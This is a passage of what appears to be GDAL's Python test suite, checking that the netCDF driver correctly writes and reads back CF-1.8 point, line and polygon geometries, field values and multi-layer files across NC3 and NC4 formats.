assert(fWkt == "MULTIPOLYGON (((0 0,-1 0,-1 -1,0 0)))")
assert(fnam == "Triangle_Flipped")
def test_polygon3D_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon3D_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon3D_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon3D_no_ir_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("noir_write")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
    # With no interior rings involved, these features are read back as simple Polygons
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fid = feat.GetFieldAsInteger("ID")
assert(fWkt == "POLYGON ((0 0 0,1 0 2,1 1 0,0 0 2))")
assert(fid == 0)
    # The second feature is a simple square (again without an interior ring)
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fid = feat.GetFieldAsInteger("ID")
assert(fWkt == "POLYGON ((3 0 -1,4 0 -2,4 1 0,3 1 -2,3 0 -1))")
assert(fid == 1)
def test_polygon3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon3D_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
    # Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons,
    # but when being written out they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 -1,1 1 -2,0 0 -3)))")
assert(fnam == "Trianglything")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 0,4 1 1,3 1 1,3 0 0),(3.5 0.25 1,3.75 0.25 1,3.75 0.5 1,3.5 0.5 1,3.5 0.25 1)))")
assert(fnam == "Prismthing")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,-1 0 1,-1 -1 2,0 0 3)))")
assert(fnam == "Trianglyflipped")
def test_multipoint_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipoint_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipoint_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipoint_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("peak_list")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (1 -1,2 -2,4 -4)")
assert(fnam == "Peaks1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (5 -5,6 -6,8 -8)")
assert(fnam == "Peaks2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (9 -9,10 -10,-2 2)")
assert(fnam == "Peaks3")
def test_multipoint3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipoint3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipoint3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipoint3D_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("drilling_sites")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (0 -1 -5,2 -2 2)")
assert(fnam == "site1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (7 -2 1,4 3 2,8 -8 3)")
assert(fnam == "site2")
def test_multiline_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multiline_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multiline_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multiline_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("streams")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((1 -5),(2 -4,3 -3,4 -2,5 -1))")
assert(fnam == "fresh_river")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((-2 5,-3 4,-4 3,-5 2))")
assert(fnam == "not_so_fresh_river")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((0 1,1 0),(2 0,-2 0))")
assert(fnam == "not_fresh_river")
def test_multiline3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multiline3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multiline3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multiline3D_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("streams")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((1 -5 10),(2 -4 9,3 -3 8,4 -2 7,5 -1 8))")
assert(fnam == "fresh_river")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((0 1 1,1 0 2),(2 0 1,-2 0 1))")
assert(fnam == "not_fresh_river")
def test_multipolygon_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
    # Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons,
    # but when being written out they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)),((0 0,-1 0,-1 -1,0 0)))")
assert(fnam == "Triangles")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 1,3 0),(3.5 0.25,3.75 0.25,3.75 0.5,3.5 0.5,3.5 0.25)),((4 4,4 5,5 4,4 4)))")
assert(fnam == "Square_in_Square_and_Triangle")
def test_multipolygon3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon3D_write_test.nc4", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon3D_write_test.nc4")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
# Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 1,1 1 1,0 0 0)),((0 0 0,-1 0 -1,-1 -1 -1,0 0 0)))")
assert(fnam == "Trianglies")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 0,4 1 1,3 1 1,3 0 0),(3.5 0.25 0,3.75 0.25 0,3.75 0.5 0.1,3.5 0.5 0.1,3.5 0.25 0)),((4 4 100,4 5 101,5 4 101,4 4 100)))")
assert(fnam == "Prismy_and_Triangly")
# This third feature is just a Polygon
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((-2 0 -5,-2 1 -6,-1 1 -6,-2 0 -5)))")
assert(fnam == "Single_Triangly")
def test_multipolygon_with_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon_no_ir_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
def test_multipolygon3D_with_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon3D_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon3D_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon3D_no_ir_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 1,1 1 2,0 0 3)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 1,4 1 2,3 0 3)),((3 0 -1,4 1 -2,3 1 -3,3 0 -4)))")
assert(fnam == "DoubleTriangle")
def test_write_buffer_restrict_correctness():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # Tests that restricting the write buffer size
    # still writes correct data.
src = gdal.OpenEx("data/netcdf-sg/write-tests/Yahara_alb.json")
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/Yahara_alb_4K_restrict.nc", src, format="netCDF", layerCreationOptions = ['BUFFER_SIZE=4096'])
gdal.VectorTranslate("tmp/Yahara_alb_default_buf.nc", src, format="netCDF")
fk_ds = ogr.Open("tmp/Yahara_alb_4K_restrict.nc")
db_ds = ogr.Open("tmp/Yahara_alb_default_buf.nc")
fk_ds_layer = fk_ds.GetLayerByName("geometry_container")
db_ds_layer = db_ds.GetLayerByName("geometry_container")
assert(fk_ds_layer is not None)
assert(db_ds_layer is not None)
for feat in range(71):
lft = fk_ds_layer.GetNextFeature()
dft = db_ds_layer.GetNextFeature()
lftgeo = lft.GetGeometryRef()
dftgeo = dft.GetGeometryRef()
assert(lftgeo.Equal(dftgeo))
def test_write_nc_from_nc():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # Tests writing a netCDF file (with a different name than the source) from another netCDF source file
src = gdal.OpenEx("data/netcdf-sg/multipoint_test.nc", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipoint_test_replica.nc", src, format="netCDF");
ncds = ogr.Open("tmp/multipoint_test_replica.nc")
    assert(ncds is not None)
layer = ncds.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (1 -1,2 -2,3 -3,4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (5 -5,6 -6,7 -7,8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (9 -9,10 -10,-1 1,-2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-3 3,-4 4,-5 5,-6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-7 7,-8 8,-9 9,-10 10)")
def test_multipolygon_with_no_ir_NC4_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # Almost identical to test_multipolygon_with_no_ir_write,
    # except this time it writes an NC4 file
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon_no_ir_write_test.nc4", src, format="netCDF", datasetCreationOptions=['FORMAT=NC4']);
nc_tsrc = ogr.Open("tmp/multipolygon_no_ir_write_test.nc4")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
def test_multipolygon3D_NC4C_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
# This test is identical to test_multipolygon3D_write
# except it writes to NC4C
gdal.VectorTranslate("tmp/multipolygon3D_write_test.nc", src, format="netCDF", datasetCreationOptions=['FORMAT=NC4C']);
nc_tsrc = ogr.Open("tmp/multipolygon3D_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
# Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 1,1 1 1,0 0 0)),((0 0 0,-1 0 -1,-1 -1 -1,0 0 0)))")
assert(fnam == "Trianglies")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 0,4 1 1,3 1 1,3 0 0),(3.5 0.25 0,3.75 0.25 0,3.75 0.5 0.1,3.5 0.5 0.1,3.5 0.25 0)),((4 4 100,4 5 101,5 4 101,4 4 100)))")
assert(fnam == "Prismy_and_Triangly")
# This third feature is just a Polygon
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((-2 0 -5,-2 1 -6,-1 1 -6,-2 0 -5)))")
assert(fnam == "Single_Triangly")
def test_netcdf_dimension_labels_with_null():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# Crashes with 4.1.3 of Ubuntu Precise
if gdaltest.netcdf_drv_version.startswith('4.0.') or gdaltest.netcdf_drv_version.startswith('4.1.'):
pytest.skip('Test crashes with this libnetcdf version')
with gdaltest.error_handler():
assert gdal.Open('data/dimension_labels_with_null.nc')
def test_write_multiple_layers_one_nc():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # tests writing multiple layers to a single NC3 file,
    # with each geometry container written as its own layer;
    # this also tests "update mode" for CF-1.8 writing
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc.nc", src, format="netCDF");
src = gdal.OpenEx("data/netcdf-sg/write-tests/point3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc.nc", src, format="netCDF", accessMode='update');
nc_tsrc = ogr.Open("tmp/mlnc.nc")
assert(nc_tsrc.GetLayerCount() == 2)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_write_multiple_layers_one_nc_NC4():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # nearly identical to the previous test except that
    # it writes to NC4, not NC3 (converting the NC3 file to NC4),
    # and it writes all layers at once (not in update mode)
src = gdal.OpenEx("tmp/mlnc.nc", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc4.nc4", src, format="netCDF", datasetCreationOptions=['FORMAT=NC4']);
nc_tsrc = ogr.Open("tmp/mlnc4.nc4")
assert(nc_tsrc.GetLayerCount() == 2)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_write_multiple_layers_one_nc_back_to_NC3():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # nearly identical to the previous test except that
    # it converts the NC4 file back to NC3
    # and writes all layers at once (not in update mode);
    # test_write_multiple_layers_one_nc writes one layer and then another in update mode
src = gdal.OpenEx("tmp/mlnc4.nc4", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc_noupdate3.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/mlnc_noupdate3.nc")
assert(nc_tsrc.GetLayerCount() == 2)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_SG_NC3_field_write():
# Tests all the NC3 field writing capabilities with
# buffering.
src = gdal.OpenEx("data/netcdf-sg/write-tests/field_test_nc3.nc", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/bufft.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/bufft.nc")
assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("names_geometry")
assert(layer is not None)
assert(layer.GetFeatureCount() == 1)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
fid = feat.GetFieldAsInteger("IDS")
fnum1 = feat.GetFieldAsInteger("NUM_1")
fnum2 = feat.GetFieldAsInteger("NUM_2")
fflt = feat.GetFieldAsDouble("FL")
fdbl = feat.GetFieldAsDouble("DBL")
assert(fWkt == "POINT (1 -1)")
assert(fnam == "Guage_1")
assert(fid == 0)
assert(fnum1 == 1)
assert(fnum2 == 2)
assert(fflt == 1.5)
assert(fdbl == 99.5)
def test_states_full_layer_buffer_restrict_correctness():
# Tests whether the write buffer restriction
# still writes correct data.
# Note: this is different from the Yahara version in that it also tests
# correctness of writing buffered NC_CHARs and NC_STRINGs (NC4)
src = gdal.OpenEx("data/netcdf-sg/write-tests/cf1.8_states.json")
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/states_4K_restrict.nc", src, format="netCDF", layerCreationOptions = ['BUFFER_SIZE=4096'])
gdal.VectorTranslate("tmp/states_default_buf.nc", src, format="netCDF")
fk_ds = ogr.Open("tmp/states_4K_restrict.nc")
db_ds = ogr.Open("tmp/states_default_buf.nc")
fk_ds_layer = fk_ds.GetLayerByName("geometry_container")
db_ds_layer = db_ds.GetLayerByName("geometry_container")
assert(fk_ds_layer is not None)
assert(db_ds_layer is not None)
for feat in range(49):
lft = fk_ds_layer.GetNextFeature()
dft = db_ds_layer.GetNextFeature()
lftgeo = lft.GetGeometryRef()
dftgeo = dft.GetGeometryRef()
assert(lftgeo.Equal(dftgeo))
def test_empty_polygon_read_write():
# Tests writing features to a layer of empty polygons
src = gdal.OpenEx("data/netcdf-sg/write-tests/empty_polygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/empty_polygon.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/empty_polygon.nc")
assert(nc_tsrc is not None)
nc_layer = nc_tsrc.GetLayerByName("places");
assert(nc_layer.GetFeatureCount() == 2)
first = nc_layer.GetNextFeature()
assert(first.GetFieldAsString("NAMES") == "Somewhere")
assert(first.GetGeometryRef().ExportToWkt() == "POLYGON ((0 1,1 0,2 0,0 1))")
second = nc_layer.GetNextFeature()
assert(second.GetFieldAsString("NAMES") == "Everywhere")
assert(second.GetGeometryRef().IsEmpty())
def test_empty_multiline_read_write():
# Tests writing features to a layer of empty multilinestrings
src = gdal.OpenEx("data/netcdf-sg/write-tests/empty_mline_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
